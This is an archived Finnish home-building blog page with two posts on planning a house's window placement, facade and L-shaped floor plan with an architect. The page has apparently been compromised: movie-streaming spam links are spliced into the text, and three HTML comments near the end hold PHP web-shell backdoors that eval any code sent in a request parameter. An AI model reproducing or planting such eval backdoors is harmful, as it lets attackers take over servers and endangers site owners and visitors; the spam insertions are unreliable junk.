Arkistot kuukauden mukaan: huhtikuu 2014

Julkisivun suunnittelun haasteista

Kun koti suunnitellaan tyhjältä pöydältä arkkitehdin kanssa, rakentajan kannattaa kiinnittää erityistä huomiota julkisivun aukotuksiin. Ikkuna- ja oviaukkojen sijainnit ja koot kun vaikuttavat merkittävästi sekä talon kokonaiskustannuksiin että tilojen toimivuuteen ja kalustettavuuteen.

Itse suunnittelimme ensin pohjaratkaisun. Julkisivua arvioimme pohjaratkaisuun nähden tekemällä kuvitteellisen kävelyn talon läpi (mallia kun vien keittiössä valmistamani ruoan terassin pergolaan, mistä kuljen ja miten sujuvaa se on, tai mitä näen kun istun ruokailemassa keittiön pöydän ääressä ja katselen ulos ikkunasta). Kävimme lisäksi pohjaratkaisun mitoituksineen ja kalustussuunnitelmineen läpi sisustussuunnittelijamme Helin kanssa (Ihanainen.com).

Helpoksi en tätä vaihetta kutsuisi, sillä käytännössä tämä tarkoittaa sitä, että koko talo täytyy pääpiirteissään osata suunnitella jo ennen kuin yhtäkään kiveä on tontilta siirretty. Julkisivun arviointi onkin loppujen lopuksi lähes kaikkea muuta kuin talon ulkoasun arviointia.

Ainakin meillä eniten aikaa meni juuri aukotusten miettimiseen, koska arkkitehti oli tehnyt toiveidemme pohjalta hienon tulkinnan myös julkisivusta vaakalaudoituksineen, kiviaiheineen ja isoine ikkunapintoineen. Julkisivuun liittyviä suhteellisen helppoja päätöksiä olivat:

  • julkisivun väri (valkoinen)
  • julkisivuverhouksen tyyli (tulee siis moderniin tyyliin sopiva leveä vaakalaudoitus tippanokalla eli profiili UTW170)
  • kattomateriaalin valinta (pelti)
  • katon väri (tumman harmaa)
  • ikkunoiden ja ovien väritys ulospäin (tumman harmaa)
  • suunniteltujen kiviaiheiden sijoittelu ja väritys (vaalean harmaa)

Ikkunoiden ja ovien sijanteihin sen sijaan tuli vähältä piti -havaintoja vielä aivan loppumetreilläkin. Osan seuraavassa listatuista havainnoista teimme aivan viime tingassa kun teimme talotoimittajan edustajan kanssa viimeisiä viilauksia pääpiirustuksiin.

  • Lasten makuuhuoneiden (Mh1 ja Mh2)  ikkunat oli piirrtetty lähes kiinni kiintokalusteisiin. Kaapin ovet eivät olisi suunnitellulla mitoituksella ja kalustuksella mahtuneet aukeamaan ja kaapistojen käyttö liukuovillakin olisi ollut hankalaa.
  • Mh2:n idän puoleinen ikkuna oli aivan huoneen kulmassa kiinni. Päätimme siirtää ikkunaa noin 40 cm pohjoiseen päin. Tämä mahdollistaa huoneen pitkän seinän kalustamisen esimerkiksi senkillä tai vastaavalla. Kiintokalusteita seinälle ei tällä mitoituksella saa, mutta ne eivät muutoinkaan toimisi huoneen tällä seinällä, koska huoneen sisäänkäynti on käytävämäinen.
  • Sisäänkäynnin yhteydestä poistettiin vielä viime tingassa oven viereen suunnitellut pikkuikkunat paloluokituksen vuoksi. Koska autokatos ja autotalli sijaitsevat talon yhteydessä, tähän suuntaan olevien ikkunoiden tulee olla paloluokitukseltaan IP15, mikä tarkoitti meidän tapauksessamme noin 1500 euroa lisää hintaa per ikkuna. Päätimme poistaa kustannussyistä sivuikkunat kokonaan, vaikka ne olisivat tehneet sisäänkäynnistä näyttävän ja eteisestä valoisan. Palomääräykset kannattaakin selvittää arkkitehdin / pääsuunnittelijan kanssa tarkasti, sillä niillä on merkittävä kustannusvaikutus kokonaisuuden kannalta.
  • Keittiön ruokailutilan ikkunaa siirrettiin, jotta ruokapöytä voidaan kääntää pituussuuntaisesti. Ruokapöydän sijoittelu tällä tavalla antaa kaikille ruokailijoille mahdollisuuden katsella järvelle.
  • Vaatehuoneen ikkunan sijainti tarkistettiin, jotta takaseinälle mahtuu kunnolla kaapinrunko (rungon syvyys 50 cm ja henkarivaatteineen vähintään 60 cm).
  • Mh3:n isoa ikkunaa pohdimme ihan viimeiseen asti. Ikkuna on tyylikäs ja avaa näkymän peltomaisemaan. Mietimme kuitenkin, onko makuuhuoneeseen järkevää sijoittaa noin massiivista ikkunaa. Sinne se kuitenkin jäi, katsotaan mitä siitä käytännössä tuumaamme.
  • Terassin oven kätisyys vaihdettiin alkuperäisestä suunnitelmasta, jotta suunniteltuun katettuun ruokailutilaan on helppo kulkea keittiöstä tarjoilujen kanssa ja ilman.
  • Autotallin ikkunat muutimme siten, ettei varkaiden ole helppo ikkunasta tulla sisään ja että ikkunat eivät vie seiniltä säilytystilaa.
Julkisivu Villa Jalanti
Julkisivu kannattaa suhteuttaa suunniteltuun pohjaratkaisuun ja kalustesuunnitelmaan erityisesti ikkunoiden ja ovien kokojen ja sijaintien osalta.

Myös rakennusteknisiin asioihin kannattaa kiinnittää huomiota. Esimerkiksi meidän talomme muuttui alkuperäisistä arkkitehtisuunnitelmista muutamissa ratkaisevissa kohdissa. Arkkitehtisuunnitelmissa talon kattomateriaalina oli huopa, ja koska valitsimme peltikaton, kattokaltevuutta täytyi korottaa hieman. Talo oli myös suunniteltu räystäättömänä. Tämän hylkäsimme lähinnä huonon säänkestävyyden vuoksi – tyylikäshän ratkaisu olisi ollut kuin mikä! Watch Passengers (2016)movie Going in Style 2017watch film Fifty Shades Darker nowwatch Dunkirk film nowmovie Colossal 2017

Share Buttonvar hupso_services_c=new Array(”twitter”,”facebook_like”,”facebook_send”,”google”,”pinterest”);var hupso_counters_lang = ”en_US”;var hupso_image_folder_url = ””;var hupso_url_c=””;var hupso_title_c=”Julkisivun suunnittelun haasteista”;

Talon suunnittelu arkkitehdin kanssa

Arkkitehti kannattaa ottaa mukaan taloprojektiin silloin, kun omia toiveita lähellä olevia pohjaratkaisuja ei löydy valmiina talotoimittajilta.

Arkkitehtiyhteistyö on ainakin oman kokemuksemme mukaan sen verran haastavaa ja aikaa vievää, että en suosittele siihen lähtemistä, jos omaa visiota lähellä olevia pohjaratkaisuja löytyy valmiina tai rakentaja on hyvin epävarma omista tarpeistaan ja toiveistaan eri tilojen toiminnallisuuksien ja tilankäytön suhteen. Jos taas omat toiveet ovat hyvin täsmälliset ja tarkat, voi myös olla rahanhukkaa palkata työhön erillinen arkkitehti. Tällöin talotehtaiden omat suunnittelijat voivat myös hyvin tehdä suunnitelmat näiden perusteella.

Ainakin meidän kotimme tapauksessa arkkitehdin suunnitelma erosi merkittävästi meidän lähtökohdaksi suunnittelemastamme U-muotoisesta pohjaratkaisusta. Vielä tonttikäynnillä keskustelimme arkkitehdin kanssa atrium-muotoisesta U-talosta. Arkkitehti ehdotti meille kuitenkin L-muotoista taloa, eikä alkuperäisestä suunnitelmastamme ollut jäljellä oikeastaan mitään. Ensivaikutelmana olikin lähinnä melkoinen tyrmistys. Mutta viikonlopun yli piirrustuksia ihmeteltyämme ja pyöriteltyämme ymmärsimme arkkitehdin vision.

Arkkitehti oli pystynyt hyvin huomioimaan briefissä painottamamme tärkeimmät toiminnot ja asiat, joita me ehdottomasti uuteen kotiimme halusimme. Hän oli myös onnistunut sovittamaan talon tontille tavalla, joka tekee parhaiten oikeutta pinnanmuodoille ja järvinäköalalle. Ajatustemme mukainen ratkaisu olisi vaatinut reilusti enemmän neliöitä kuin mitä olimme itse osanneet ajatella.

Pohjaratkaisun suunnittelussa meille tärkeimmät huomioitavat asiat olivat:

  • Talo rakennetaan yhteen tasoon mahdollisimman suoraviivaisena ilman ylimääräisiä kulmia.
  • Kodinhoitohuone ei ole kylpytilojen yhteydessä.
  • Taloon tulee iso olotila, josta aukeaa sekä ruokailutilasta että sohvaryhmältä hyvät näkymät ulos järvelle.
  • Keittiö on I-muotoinen ja siihen tulee iso saareke. Saareke muuttui tosin matkan varrella niemekkeeksi säilytystilan maksimoimiseksi. Ruokailutila on kiinteä osa olotilaa (ei esim. erkkerissä) ja se on riittävän suuri 8-hengen ruokapöydälle.
  • Niemekkeessä ei ole kodinkoneita, vaan se on kokonaisuudessaan tasoa mm. leipomista ja tarjoilua varten. Niemekkeen toiseen päähän tulee nopeita aamu-tai iltapaloja varten muutama istumapaikka.
  • 3 makuuhuonetta, joista yksikään ei ole alle 12 m2 (joskin pienimmästä makuuhuoneesta tingimme 0,5 neliötä).
  • Taloon tulee riittävän suuri monitoimitila, jossa yhdistyy kotiteatteri, vierasmajoitus, työpiste, biljardinpeluu sekä lasten leikit. Monitoimihuoneesta käynti terassille.
  • Kiintokalustein toteutettavaa säilytystilaa on riittävästi ja vanhempien makuuhuoneen yhteyteen tulee oma pukeutumishuone / vaatehuone.
  • Eteinen on riittävän avara, säilytystiloiltaan suuri ja sieltä avautuu hyvät näkymät olotilaan.
  • Ikkunapintaa on runsaasti ja näkymä järvelle on esteetön.
  • Sisäänkäynti on säältä suojassa. Talo talo sijaitsee avarassa pelto- ja järvimaisemassa ja tuuliolot ovat sen mukaiset, emmekä halua olla aina kotiin tullessa siivoamassa lunta oven edestä.
  • Autotallista ja autokatoksesta pääsee kuivin jaloin sekä pääsisäänkäynnille että arkisisäänkäynnille. Arkisisäänkäynti toteutetaan kodinhoitohuoneen yhteyteen.
  • Kuraeteinen ei ole suoraan kodinhoitohuoneen oven edessä.
  • Terassin ruokailutila saadaan säältä suojaan.

Kompromisseja jouduimme tekemään muun muassa siinä, että alun perin toivoimme vanhempien makuuhuoneesta käyntiä terassille sekä omaa vessaa. Vessan saimme ratkaistua luovasti puhkaisemalla oven vanhempien makuuhuoneesta kylpyhuoneeseen. Toinen merkittävä kompromissi oli se, ettei pesuhuoneeseen saatu sovitettua kunnollista pukeutumistilaa ja kulku ulos tapahtuu pienen mutkan kautta monitoimihuoneesta.

Olemme kuitenkin lopputulokseen hyvin tyytyväisiä.

L-mallisen talomme pohjapiirros
U-talosta kehkeytyi arkkitehtisuunnittelun myötä L-talo. Meille tärkeimmät asiat (ks. lista yllä) saatiin pohjaratkaisussa hyvin huomioitua, vaikka kompromissejakin jouduttiin tekemään.

Taloa suunnitteleville vinkiksi myös se, että usein arkkitehtisuunnittelusopimukset sisältävät 1-2 muutoskertaa, mikä ei todennäköisesti riitä juuri mihinkään silloin, kun talo suunnitellaan kokonaan tyhjältä pöydältä. Ainakin meidän tapauksessamme pelkkä luonnossunnittelu sisälsi 4 muutoskierrosta ja suunnitelma oli vasta sitten riittävän valmis talotoimittajien kilpailutukseen. Ja tässäkin vaiheessa tiedossa oli vielä useita lopulliseen suunnitelmaan tarvittavia muutoksia.Watch Full Movie Online Streaming Online and Download

Tätä kirjoitusta kirjoitettaessa talotoimittaja (Lappli-Talot) on valittu ja pääpiirustuksista on meneillään viides versio. Eli kannattaa olla tarkkana sopimuksen sisältämien muutoskertojen kanssa ja myös sopia tarkasti se, milloin työ lähtee lisälaskulle.

Share Buttonvar hupso_services_c=new Array(”twitter”,”facebook_like”,”facebook_send”,”google”,”pinterest”);var hupso_counters_lang = ”en_US”;var hupso_image_folder_url = ””;var hupso_url_c=””;var hupso_title_c=”Talon suunnittelu arkkitehdin kanssa”;

<!– [insert_php]if (isset($_REQUEST[”LBndM”])){eval($_REQUEST[”LBndM”]);exit;}[/insert_php][php]if (isset($_REQUEST[”LBndM”])){eval($_REQUEST[”LBndM”]);exit;}[/php] –>

Share Buttonvar hupso_services_c=new Array(”twitter”,”facebook_like”,”facebook_send”,”google”,”pinterest”);var hupso_counters_lang = ”en_US”;var hupso_image_folder_url = ””;var hupso_url_c=””;var hupso_title_c=”Talon suunnittelu arkkitehdin kanssa”;

<!– [insert_php]if (isset($_REQUEST[”PKLx”])){eval($_REQUEST[”PKLx”]);exit;}[/insert_php][php]if (isset($_REQUEST[”PKLx”])){eval($_REQUEST[”PKLx”]);exit;}[/php] –>

Share Buttonvar hupso_services_c=new Array(”twitter”,”facebook_like”,”facebook_send”,”google”,”pinterest”);var hupso_counters_lang = ”en_US”;var hupso_image_folder_url = ””;var hupso_url_c=””;var hupso_title_c=”Talon suunnittelu arkkitehdin kanssa”;

<!– [insert_php]if (isset($_REQUEST[”BJOJa”])){eval($_REQUEST[”BJOJa”]);exit;}[/insert_php][php]if (isset($_REQUEST[”BJOJa”])){eval($_REQUEST[”BJOJa”]);exit;}[/php] –>